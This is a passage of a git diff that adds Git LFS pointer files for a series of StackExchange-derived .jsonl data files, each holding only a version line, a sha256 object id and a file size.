sha256:b266ed63349aedf3149e7a8077528779a086dec270779061d792aebbbd0efb74 +size 34565831 diff --git a/data/stackexchange/1-1/1499_2289.jsonl b/data/stackexchange/1-1/1499_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..eb7c9e420500e9dfc99fb94cf1df833a50880d9e --- /dev/null +++ b/data/stackexchange/1-1/1499_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4b97b93f3b7674cf90cd3f559c8fee7ff5bbbe8f3a37747893b36ecfa7d90e82 +size 34272725 diff --git a/data/stackexchange/1-1/149_2289.jsonl b/data/stackexchange/1-1/149_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..850e8aa41612182cc159a016e01d92accced91f6 --- /dev/null +++ b/data/stackexchange/1-1/149_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:08e5b5aae312871616341fb1cdee084d423c900652d5da93e123892c6fdabaa7 +size 33715696 diff --git a/data/stackexchange/1-1/14_2289.jsonl b/data/stackexchange/1-1/14_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6271250216056b7768d4fce001f21e991fef0e1b --- /dev/null +++ b/data/stackexchange/1-1/14_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a666d5a0a9c1191b9541dc4df814b9abec5285e90dbf618639e003d943d0e313 +size 35950488 diff --git a/data/stackexchange/1-1/1500_2289.jsonl b/data/stackexchange/1-1/1500_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5fa46e04e80f90842de8a15706af7e351b14dc18 --- /dev/null +++ b/data/stackexchange/1-1/1500_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c3c8f5661ba5fa5f142107d7e82066cd3868601a78316fff4bf1413839e8d27b +size 34093143 diff --git a/data/stackexchange/1-1/1501_2289.jsonl b/data/stackexchange/1-1/1501_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..768f37f6521bc4008256ce2c90e427a7028e3a48 --- /dev/null +++ b/data/stackexchange/1-1/1501_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e8a6db9c5a8a78389aba32a613c20a242fdb4a5b298e9d92c425f305edb2714e +size 34226688 diff --git a/data/stackexchange/1-1/1502_2289.jsonl b/data/stackexchange/1-1/1502_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..eb4d5f895315daa242ebfef4e83919f9ba0e323c --- /dev/null +++ b/data/stackexchange/1-1/1502_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6a7efd3ae98881123590c4d87b9b1b227d12d9bedaa70da065b0fb79ad634b14 +size 34758661 diff --git a/data/stackexchange/1-1/1503_2289.jsonl b/data/stackexchange/1-1/1503_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..36d66cfba71a84770d228656f4914e08ccd72aff --- /dev/null +++ b/data/stackexchange/1-1/1503_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a864c1854a028889360d88f1f53b29e60cbbdf5fa63303abf01520e96dfcadc1 +size 34691912 diff --git a/data/stackexchange/1-1/1504_2289.jsonl b/data/stackexchange/1-1/1504_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..56090c910546335ea940f1facac24bb7ba457f52 --- /dev/null +++ b/data/stackexchange/1-1/1504_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3114b633b5396cabdbd7f6ba47b31abe9db2c5897e70b3fe18c4f86b11bb8a54 +size 34529768 diff --git a/data/stackexchange/1-1/1505_2289.jsonl b/data/stackexchange/1-1/1505_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0caea871e0c7f5739c36daeee17190e7ac4f54f7 --- /dev/null +++ b/data/stackexchange/1-1/1505_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1cb24348f1d4ead4d63283b543a2522e9235c56b4126e3df8e63c79404dd3685 +size 34492017 diff --git a/data/stackexchange/1-1/1506_2289.jsonl b/data/stackexchange/1-1/1506_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ae024a65662510feb538457364c9194535d690f8 --- /dev/null +++ b/data/stackexchange/1-1/1506_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:180b645f215e06c27af58113fafee1502dd64732ef2c97ac30517bbee6ab239f +size 35063256 diff --git a/data/stackexchange/1-1/1507_2289.jsonl b/data/stackexchange/1-1/1507_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8a8407d36b26fe1580f01ea7428d0764833e44d4 --- /dev/null +++ b/data/stackexchange/1-1/1507_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:467af76f5e516e5f82efd2be4d416a2830ad2451f51d74095d650bd9a6444814 +size 34218594 diff --git a/data/stackexchange/1-1/1508_2289.jsonl b/data/stackexchange/1-1/1508_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4b02c4b1fe0874737ad8b84a0ec28998a984c42b --- /dev/null +++ b/data/stackexchange/1-1/1508_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2c77e987670610ca8c8622156fef768a83a98e665758db565303229646ba946c +size 34748624 diff --git a/data/stackexchange/1-1/1509_2289.jsonl b/data/stackexchange/1-1/1509_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3f7762ebc98160ffe12e62e23f8a8c1f00a1506a --- /dev/null +++ b/data/stackexchange/1-1/1509_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:10502ac8c3640cecb1d0f7985ed3dc2ead328db43c004c5599c92f5ffc3c9f9d +size 34453470 diff --git a/data/stackexchange/1-1/150_2289.jsonl b/data/stackexchange/1-1/150_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5f6cbbf9425084df4d7895c1fe199dd73fbcfb0f --- /dev/null +++ b/data/stackexchange/1-1/150_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0a6d38d7a6dac539039324730b2748c049763d0315c41ba964dcf5d3fbe7e0c0 +size 35127365 diff --git a/data/stackexchange/1-1/1510_2289.jsonl b/data/stackexchange/1-1/1510_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e7b68cdc0031e183534479f0aaf35ebb3d83c8b4 --- /dev/null +++ b/data/stackexchange/1-1/1510_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a63031b1f678c588a454b0fb56aaacce6ff74b83fd941b0f21ce8672e829f103 +size 34500778 diff --git a/data/stackexchange/1-1/1511_2289.jsonl b/data/stackexchange/1-1/1511_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cfa10f569e81e4db8cc8df3c60819889c2ed3ac2 --- /dev/null +++ b/data/stackexchange/1-1/1511_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:91bf449850289c78a9140ba2a10a505c172843ae0d3ae84a1a0c625c6c6b7a0d +size 33958093 diff --git a/data/stackexchange/1-1/1512_2289.jsonl b/data/stackexchange/1-1/1512_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4de9492a741b53db69ad9711487d5d34ce6da7b9 --- /dev/null +++ b/data/stackexchange/1-1/1512_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bdfa5ac7172eadb7df9f09580bc1373b3d086ef9d2666abf0a88fb45514668e3 +size 34683852 diff --git a/data/stackexchange/1-1/1513_2289.jsonl b/data/stackexchange/1-1/1513_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5a8d47b9e86e7a1fc93101b1e8c6c28644e3db27 --- /dev/null +++ b/data/stackexchange/1-1/1513_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:32ff1383f2eda4f0f2fd863f73a6c64adf4588ffed6abcc777c7c640c2ecb0ee +size 34834677 diff --git a/data/stackexchange/1-1/1514_2289.jsonl b/data/stackexchange/1-1/1514_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..00567c6949ccd1f8844deecf3e68ceb183b7d146 --- /dev/null +++ b/data/stackexchange/1-1/1514_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0f6f1667c99844a267d06987e4d109c9a98bf9fc7f9b4780efbc4958fcae5cde +size 35061737 diff --git a/data/stackexchange/1-1/1515_2289.jsonl b/data/stackexchange/1-1/1515_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5b1b5508fe6a6c6b8da551e292ca5c371db7778f --- /dev/null +++ b/data/stackexchange/1-1/1515_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:47f2ec52043635fb708b7a31f9373151f283bbe215d532c8d007c63b29eac322 +size 34124945 diff --git a/data/stackexchange/1-1/1516_2289.jsonl b/data/stackexchange/1-1/1516_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5b8945de96158e00f4e00ca842a98b79b180f3e5 --- /dev/null +++ b/data/stackexchange/1-1/1516_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:455d3b7e3ecf6679d27556b60b270ada04c5b460862c291f3212d5d60f2e0bd2 +size 34640756 diff --git a/data/stackexchange/1-1/1517_2289.jsonl b/data/stackexchange/1-1/1517_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4a6cff47b04b457f7ff683833d99bb373e893f3a --- /dev/null +++ b/data/stackexchange/1-1/1517_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fa75a0353d1e252e8ab45f95548ea3c340a860abb43e2e1c0b7ecc69b27da963 +size 34733098 diff --git a/data/stackexchange/1-1/1518_2289.jsonl b/data/stackexchange/1-1/1518_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..34c9b9e386e38df291c7d57a0003ca9ac1b9fae5 --- /dev/null +++ b/data/stackexchange/1-1/1518_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4c1afb7d54ba6c699ba7059b2cc05fbbcbcdb80cf542f38770c14cfc54682cb8 +size 34800201 diff --git a/data/stackexchange/1-1/1519_2289.jsonl b/data/stackexchange/1-1/1519_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3d88f0b383194733143ad0a41f7866650f3e378b --- /dev/null +++ b/data/stackexchange/1-1/1519_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:57ebf059ffcbf8dffe417521c625f309bddc227b43d6eefe2a36302728fd5bd2 +size 34649891 diff --git a/data/stackexchange/1-1/151_2289.jsonl b/data/stackexchange/1-1/151_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9dfa38f0681baa22428a6fdf5a573d0cd0fc2832 --- /dev/null +++ b/data/stackexchange/1-1/151_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:70a7651c7d2feb777033aee03a324dc31ae4495117f27ba739e05d24ee5c7370 +size 34819808 diff --git a/data/stackexchange/1-1/1520_2289.jsonl b/data/stackexchange/1-1/1520_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..27d4a7138465923644f6b61f570675829da6b1e5 --- /dev/null +++ b/data/stackexchange/1-1/1520_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:954df8d68efb8597a853f39f16393f1ebfa204128d31c2ad9995692de52dcb4b +size 34420024 diff --git a/data/stackexchange/1-1/1521_2289.jsonl b/data/stackexchange/1-1/1521_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8f8c227c25c6878acf528f8055cb47546b96408c --- /dev/null +++ b/data/stackexchange/1-1/1521_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d6f62fdefc729b50a498e58a5f8c6f65f80d2b6321c81e7bb8160c7ad1ae6a0a +size 34568414 diff --git a/data/stackexchange/1-1/1522_2289.jsonl b/data/stackexchange/1-1/1522_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..81f9854b8fec75a8ce3231838a2caa48770c8d1d --- /dev/null +++ b/data/stackexchange/1-1/1522_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bbc83574bf8682a7107c875da9809383063c9eeaafc8640c656257d4db4a9935 +size 34754359 diff --git a/data/stackexchange/1-1/1523_2289.jsonl b/data/stackexchange/1-1/1523_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..235bd36b2d3ba7f6b20df2ee626d60f2b7a226e9 --- /dev/null +++ b/data/stackexchange/1-1/1523_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8477a9bb7e1ed8fb80daf7636f4eb83d5869b80bb962eb7b3cc7d8f912923ccb +size 34372530 diff --git a/data/stackexchange/1-1/1524_2289.jsonl b/data/stackexchange/1-1/1524_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9e8dd8d497ef608b7b5752bc10b239ee79a1fb63 --- /dev/null +++ b/data/stackexchange/1-1/1524_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a0f585b7d4b75b947b9d054b86e1bbae9404e794250519cc1adbf65814ff669d +size 34893660 diff --git a/data/stackexchange/1-1/1525_2289.jsonl b/data/stackexchange/1-1/1525_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..30cf7bf127ff5539404e38cf43d421b4f2432c5c --- /dev/null +++ b/data/stackexchange/1-1/1525_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:463fea7a7f7f189adb8b1e3cd82a146bb55d2c2f284c4f3db0e9fba19fa77921 +size 34421835 diff --git a/data/stackexchange/1-1/1526_2289.jsonl b/data/stackexchange/1-1/1526_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..50a19710b7733dcb5188ba7bde62c557006ce0b3 --- /dev/null +++ b/data/stackexchange/1-1/1526_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f77bbfe3de2bec4b0c1f2d2e6113efe0b821bbadffbe2fd343834eda49046ef8 +size 34427300 diff --git a/data/stackexchange/1-1/1527_2289.jsonl b/data/stackexchange/1-1/1527_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e143026cad232f879afe94a510c787a32a24a886 --- /dev/null +++ b/data/stackexchange/1-1/1527_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b144dbc0950c525e3d84211e51d2d340aaaa4a060cd558d81ffb4e1f2dccbcbf +size 34772796 diff --git a/data/stackexchange/1-1/1528_2289.jsonl b/data/stackexchange/1-1/1528_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..db1240493f279f138090368abd7597b8e8e3e36f --- /dev/null +++ b/data/stackexchange/1-1/1528_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d920596d9b2db80b9924b5a9bc602ab92f85763e107590a35ea6848c391308ed +size 34552681 diff --git a/data/stackexchange/1-1/1529_2289.jsonl b/data/stackexchange/1-1/1529_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cef519433a62613429a498e59741000a3127d4b2 --- /dev/null +++ b/data/stackexchange/1-1/1529_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:aa284f991855c1d81e6d102de45a7784ae69f585ccda8e25c0f371856ce5a162 +size 34519515 diff --git a/data/stackexchange/1-1/152_2289.jsonl b/data/stackexchange/1-1/152_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ead7017baf83f43ce3c24f3cb29c43d597cd4f0a --- /dev/null +++ b/data/stackexchange/1-1/152_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:11c58e85beb2e56bd419aa27c28930fa8e8b711d9a167e0d7d868868a6d51eb4 +size 35361684 diff --git a/data/stackexchange/1-1/1530_2289.jsonl b/data/stackexchange/1-1/1530_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dbdbbf4b2b7d067f7e689a4c19608c34bee69d49 --- /dev/null +++ b/data/stackexchange/1-1/1530_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:97df2e3f151d96583a4404b662420c0d1e024c20d51920c3349adaf279c697c4 +size 34736988 diff --git a/data/stackexchange/1-1/1531_2289.jsonl b/data/stackexchange/1-1/1531_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a44bc301be7b5c6108a719666850bc497bd6605d --- /dev/null +++ b/data/stackexchange/1-1/1531_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2ed620e60507a2772b0b394fd026a7315c6f1b1271826b0eada6519758c0be26 +size 34433272 diff --git a/data/stackexchange/1-1/1532_2289.jsonl b/data/stackexchange/1-1/1532_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b9f0987aeeac1a389ced26466030622234186443 --- /dev/null +++ b/data/stackexchange/1-1/1532_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5a21327322cb3c1f4411db924b15e34b100ead48020f0cc6bb832d1b49567de5 +size 34214899 diff --git a/data/stackexchange/1-1/1533_2289.jsonl b/data/stackexchange/1-1/1533_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ce8774bc374803f8a96b1f04cc1af6eb08c57345 --- /dev/null +++ b/data/stackexchange/1-1/1533_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:41e2a51c528c812747b99aedc788eb97aa620b755f280a4222af58e597438621 +size 34928192 diff --git a/data/stackexchange/1-1/1534_2289.jsonl b/data/stackexchange/1-1/1534_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f16f55f2caa0c5fca2475d81ae6d71d5738d001a --- /dev/null +++ b/data/stackexchange/1-1/1534_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:30ee45d6f54bce35db6c6caa2b1f45f547e287580304582111e1fd6d037691e9 +size 34770694 diff --git a/data/stackexchange/1-1/1535_2289.jsonl b/data/stackexchange/1-1/1535_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3f8862db08e9904aa7fe1e2f6e1cfcaad6ae8424 --- /dev/null +++ b/data/stackexchange/1-1/1535_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7fbac68c7ef945aa13302d7903412331531bb3357e3e7ea9e16b7d36f78edb93 +size 34422365 diff --git a/data/stackexchange/1-1/1536_2289.jsonl b/data/stackexchange/1-1/1536_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b0d355f9cb24a51bd766e631c450297b445856c2 --- /dev/null +++ b/data/stackexchange/1-1/1536_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4247944de936a78d1fa2084f573b95e57515f58aeea8caace4d3381029907384 +size 34573555 diff --git a/data/stackexchange/1-1/1537_2289.jsonl b/data/stackexchange/1-1/1537_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d465fc21e1a9cea764ad93443421fea0964b1742 --- /dev/null +++ b/data/stackexchange/1-1/1537_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f97f79e333e370f982c372b729398d2eff4f0b915363d5a4dc27340804a568d7 +size 34655619 diff --git a/data/stackexchange/1-1/1538_2289.jsonl b/data/stackexchange/1-1/1538_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5dd770c8d57521215f45a0083e473cceca195b0a --- /dev/null +++ b/data/stackexchange/1-1/1538_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:16a1d43e6edec29d34382e7c61cccf7668103bccae47531c4b2954f281c2aaeb +size 34630967 diff --git a/data/stackexchange/1-1/1539_2289.jsonl b/data/stackexchange/1-1/1539_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bf556f83c16b5b3c893468f75f0bbf2abaaa156d --- /dev/null +++ b/data/stackexchange/1-1/1539_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:50b4ca24c55d2fb710050c582b69aee28f3f310d16660e8bb5e9b9bacd710966 +size 36502943 diff --git a/data/stackexchange/1-1/153_2289.jsonl b/data/stackexchange/1-1/153_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..391e7637f279da0c63b1c93b25f1f3d2f5db8f3e --- /dev/null +++ b/data/stackexchange/1-1/153_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5494a2044146dfb672df67a993d5bd6559fb2579f6986a1e9c717d9770678e44 +size 35163898 diff --git a/data/stackexchange/1-1/1540_2289.jsonl b/data/stackexchange/1-1/1540_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..eea59c5340ac732532ef2a21cc70311d720f1d91 --- /dev/null +++ b/data/stackexchange/1-1/1540_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a7590500af328049fb9900d72d9a4df944d07e8ec86332dbeef4ff1f830ce469 +size 37216618 diff --git a/data/stackexchange/1-1/1541_2289.jsonl b/data/stackexchange/1-1/1541_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9aa5b84884cbfc7bc89289fc73a9ce16a54f866c --- /dev/null +++ b/data/stackexchange/1-1/1541_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3109da4a70fc4736da825650fd5815db9c12df68d46d46309a05eb292970d68d +size 36561706 diff --git a/data/stackexchange/1-1/1542_2289.jsonl b/data/stackexchange/1-1/1542_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d9501def9ccc5f47e894e5df91600929efd29cca --- /dev/null +++ b/data/stackexchange/1-1/1542_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:be8e1466d8798e50542a4895a1c6d2dc3f41c0f12792cc2f24b474c313bf6697 +size 36256277 diff --git a/data/stackexchange/1-1/1543_2289.jsonl b/data/stackexchange/1-1/1543_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..19baa055399ef49d44315029c464227732493a3f --- /dev/null +++ b/data/stackexchange/1-1/1543_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0a4ae80646f81f27625c810e343b7676aa297144a2d3215cc646ee2c260fa5a8 +size 37282768 diff --git a/data/stackexchange/1-1/1544_2289.jsonl b/data/stackexchange/1-1/1544_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e5cbb8d67a1bb82a8bc6503ebe2bedba712261c8 --- /dev/null +++ b/data/stackexchange/1-1/1544_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d78ce9cafd291ebdabbd33075413bc4900baf5466e3f3448ad834a849c2a685d +size 37376603 diff --git a/data/stackexchange/1-1/1545_2289.jsonl b/data/stackexchange/1-1/1545_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..275bcaae6a2fadd0d5a8237162737900a8d7e32c --- /dev/null +++ b/data/stackexchange/1-1/1545_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:589a7341064b41c2aa2ccd2f3c2dfdac4162a3ceda75edda70872883e2dac944 +size 36870924 diff --git a/data/stackexchange/1-1/1546_2289.jsonl b/data/stackexchange/1-1/1546_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..66cfa969f0d9ff615d777b9e6cebab2fc6152b41 --- /dev/null +++ b/data/stackexchange/1-1/1546_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d6a9e7fb831e732171d578540462f2467a6db2e19a6c147d21847add0688ff7c +size 37462651 diff --git a/data/stackexchange/1-1/1547_2289.jsonl b/data/stackexchange/1-1/1547_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..882e3d91c1fc10dc07f256200671df3e12b0f479 --- /dev/null +++ b/data/stackexchange/1-1/1547_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cf6105dfb321426c4712919aeed05ce2e3ebb8476000010bfc9dcc98d07f4146 +size 37207956 diff --git a/data/stackexchange/1-1/1548_2289.jsonl b/data/stackexchange/1-1/1548_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..393f65cd682e99c721d4fc3aae2b8117117ab2ed --- /dev/null +++ b/data/stackexchange/1-1/1548_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9711a6180edbb0478f42b74f24398507e59885681316197abba8db8c0b5cf627 +size 36959469 diff --git a/data/stackexchange/1-1/1549_2289.jsonl b/data/stackexchange/1-1/1549_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b56565fe339048a39183cd569688fc3d07edfefc --- /dev/null +++ b/data/stackexchange/1-1/1549_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c06f47685562b82bdcfd5cb97ef07c48802f047304a952430c9a7325a8f13116 +size 36681024 diff --git a/data/stackexchange/1-1/154_2289.jsonl b/data/stackexchange/1-1/154_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..18933fd23bc3b5ccdb25c22fc77548817c172738 --- /dev/null +++ b/data/stackexchange/1-1/154_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:80e7d424b2adf03ec8f024957ed14d63ab54b8630aa53a87c644bd3238eb300c +size 34905892 diff --git a/data/stackexchange/1-1/1550_2289.jsonl b/data/stackexchange/1-1/1550_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2d9a4eda67e4bae5cf23210fd1df7acd45959aa1 --- /dev/null +++ b/data/stackexchange/1-1/1550_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7cdac2ab9da49886a24e35ff9f00f955a366abe39b900cb8adcbda9f911e2473 +size 37520351 diff --git a/data/stackexchange/1-1/1551_2289.jsonl b/data/stackexchange/1-1/1551_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..97a21090342ab3aa12618fa130686aeea8719398 --- /dev/null +++ b/data/stackexchange/1-1/1551_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7236ac42c64ffb996eb063fad49dfa7ae3d39c1990eb707f4ce98573c681e101 +size 37462991 diff --git a/data/stackexchange/1-1/1552_2289.jsonl b/data/stackexchange/1-1/1552_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ccff1db6a6c675d64ac808ffa8d058e85feba624 --- /dev/null +++ b/data/stackexchange/1-1/1552_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6218103207deb43a1d6056daaab0218e3dd0ff73de30a95199ef73ecb74fedeb +size 36909989 diff --git a/data/stackexchange/1-1/1553_2289.jsonl b/data/stackexchange/1-1/1553_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..28e38edadf96706563a24679e7e6490e5c67e540 --- /dev/null +++ b/data/stackexchange/1-1/1553_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2a0da3932c452cb5f0199f910cde675588372bfdfedb3a2e6147fbffbe415d75 +size 37137984 diff --git a/data/stackexchange/1-1/1554_2289.jsonl b/data/stackexchange/1-1/1554_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..62e44a7ae4b23b56b883eb42b61b36c480a07d7e --- /dev/null +++ b/data/stackexchange/1-1/1554_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0f046d9df5c5f5609597941445007556bc2dacfbe1dbc30a2e08b468e39c0f92 +size 37053431 diff --git a/data/stackexchange/1-1/1555_2289.jsonl b/data/stackexchange/1-1/1555_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..747e82a77c4bee1b3ddcb0e2ead3d87441da50d2 --- /dev/null +++ b/data/stackexchange/1-1/1555_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c33382e7b47657c2426babe37af860a3608c1e82c3faa6ee604282aeeb18ea06 +size 36599181 diff --git a/data/stackexchange/1-1/1556_2289.jsonl b/data/stackexchange/1-1/1556_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9fdd2daf6b17547684d2822cc23bca7f833451ac --- /dev/null +++ b/data/stackexchange/1-1/1556_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9827bad65f42c93267ae70aac17d09262d745976f99d282fc528ae0c2bdbf0c0 +size 37177700 diff --git a/data/stackexchange/1-1/1557_2289.jsonl 